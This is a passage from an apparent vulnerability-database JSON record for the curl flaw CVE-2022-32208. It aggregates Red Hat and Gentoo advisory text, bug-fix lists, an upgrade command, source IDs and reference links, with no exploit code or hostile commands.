DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: curl: Multiple Vulnerabilities\n     Date: December 19, 2022\n     Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n       ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/curl              \u003c 7.86.0                    \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n      https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n\n5. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/\n\nSecurity fixes:\n\n* moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fixes:\n\n* Submariner Globalnet e2e tests failed on MTU between On-Prem to Public\nclusters (BZ# 2074547)\n\n* OCP 4.11 - Install fails because of: pods\n\"management-ingress-63029-5cf6789dd6-\" is forbidden: unable to validate\nagainst any security context constrain (BZ# 2082254)\n\n* subctl gather fails to gather libreswan data if CableDriver field is\nmissing/empty in Submariner Spec (BZ# 2083659)\n\n* Yaml editor for creating vSphere cluster moves to next line after typing\n(BZ# 2086883)\n\n* Submariner addon status doesn\u0027t track all deployment failures (BZ#\n2090311)\n\n* Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn\nwithout including s3 secret (BZ# 2091170)\n\n* After switching to ACM 2.5 the managed clusters log \"unable to create\nClusterClaim\" errors (BZ# 2095481)\n\n* Enforce failed and report the violation after modified memory value in\nlimitrange policy (BZ# 2100036)\n\n* Creating an application fails with \"This application has no subscription\nmatch selector (spec.selector.matchExpressions)\" (BZ# 2101577)\n\n* Inconsistent cluster resource statuses between \"All Subscription\"\ntopology and individual topologies (BZ# 2102273)\n\n* managed cluster is in \"unknown\" state for 120 mins after OADP restore\n\n* RHACM 2.5.2 images (BZ# 2104553)\n\n* Subscription UI does not allow binding to label with empty value (BZ#\n2104961)\n\n* Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD (BZ#\n2106069)\n\n* Region information is not available for Azure cloud in managedcluster CR\n(BZ# 2107134)\n\n* cluster uninstall log points to incorrect container name (BZ# 2107359)\n\n* ACM shows wrong path for Argo CD applicationset git generator (BZ#\n2107885)\n\n* Single node checkbox not visible for 4.11 images (BZ# 2109134)\n\n* Unable to deploy hypershift cluster when enabling\nvalidate-cluster-security (BZ# 2109544)\n\n* Deletion of Application (including app related resources) from the\nconsole fails to delete PlacementRule for the application (BZ# 20110026)\n\n* After the creation by a policy of job or deployment (in case the object\nis missing)ACM is trying to add new containers instead of updating (BZ#\n2117728)\n\n* pods in CrashLoopBackoff on 3.11 managed cluster (BZ# 2122292)\n\n* ArgoCD and AppSet Applications do not deploy to local-cluster (BZ#\n2124707)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2074547 - Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters\n2082254 - OCP 4.11 - Install fails because of: pods \"management-ingress-63029-5cf6789dd6-\" is forbidden: unable to validate against any security context constraint\n2083659 - subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec\n2086883 - Yaml editor for creating vSphere cluster moves to next line after typing\n2090311 - Submariner addon status doesn\u0027t track all deployment failures\n2091170 - Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret\n2095481 - After switching to ACM 2.5 the managed clusters log \"unable to create ClusterClaim\" errors\n2100036 - Enforce failed and report the violation after modified memory value in limitrange policy\n2101577 - Creating an application fails with \"This application has no subscription match selector (spec.selector.matchExpressions)\"\n2102273 - Inconsistent cluster resource statuses between \"All Subscription\" topology and individual topologies\n2103653 - managed cluster is in \"unknown\" state for 120 mins after OADP restore\n2104553 - RHACM 2.5.2 images\n2104961 - Subscription UI does not allow binding to label with empty value\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2106069 - Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD\n2107134 - Region information is not available for Azure cloud in managedcluster CR\n2107359 - cluster uninstall log points to incorrect container name\n2107885 - ACM shows wrong path for Argo CD applicationset git generator\n2109134 - Single node checkbox not visible for 4.11 images\n2110026 - Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application\n2117728 - After the creation by a policy of job or deployment (in case the object is missing)ACM is trying to add new containers instead of updating\n2122292 - pods in CrashLoopBackoff on 3.11 managed cluster\n2124707 - ArgoCD and AppSet Applications do not deploy to local-cluster\n2124794 - CVE-2022-36067 vm2:  Sandbox Escape in vm2\n\n5",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-32208"
      },
      {
        "db": "VULHUB",
        "id": "VHN-424135"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32208"
      },
      {
        "db": "PACKETSTORM",
        "id": "168158"
      },
      {
        "db": "PACKETSTORM",
        "id": "168213"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "168289"
      },
      {
        "db": "PACKETSTORM",
        "id": "168503"
      },
      {
        "db": "PACKETSTORM",
        "id": "168378"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-32208",
        "trust": 1.9
      },
      {
        "db": "HACKERONE",
        "id": "1590071",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168289",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168503",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168378",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168158",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "168284",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168275",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167661",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168174",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167607",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168347",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168301",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-424135",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32208",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168213",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424135"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32208"
      },
      {
        "db": "PACKETSTORM",
        "id": "168158"
      },
      {
        "db": "PACKETSTORM",
        "id": "168213"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "168289"
      },
      {
        "db": "PACKETSTORM",
        "id": "168503"
      },
      {
        "db": "PACKETSTORM",
        "id": "168378"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32208"
      }
    ]
  },
  "id": "VAR-202206-1961",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424135"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-04-10T23:24:46.149000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Ubuntu Security Notice: USN-5499-1: curl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5499-1"
      },
      {
        "title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-32208"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-32208"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-840",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424135"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32208"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.2,
        "url": "https://security.gentoo.org/glsa/202212-01"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht213488"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2022/dsa-5197"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2022/oct/28"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2022/oct/41"
      },
      {
        "trust": 1.1,
        "url": "https://hackerone.com/reports/1590071"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2022-32208"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-32206"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-2097"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1292"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1586"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-2068"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1785"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1897"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1927"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-29154"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-2526"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-30631"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-29154"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-21123"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-32250"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-21166"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-21125"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1012"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-31129"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0391"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-34903"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2015-20107"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2526"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
      },
      {
        "trust": 0.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5499-1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5495-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6159"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26116"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27782"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1729"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27776"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1966"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1966"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29824"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:0408"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30632"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30698"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30629"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27406"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30293"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23772"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35525"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28131"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-38561"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40674"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22662"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0256"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30633"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1705"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22629"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23773"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30630"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24795"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26719"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1962"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30635"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2509"
      },
      {
        "trust": 0.1,
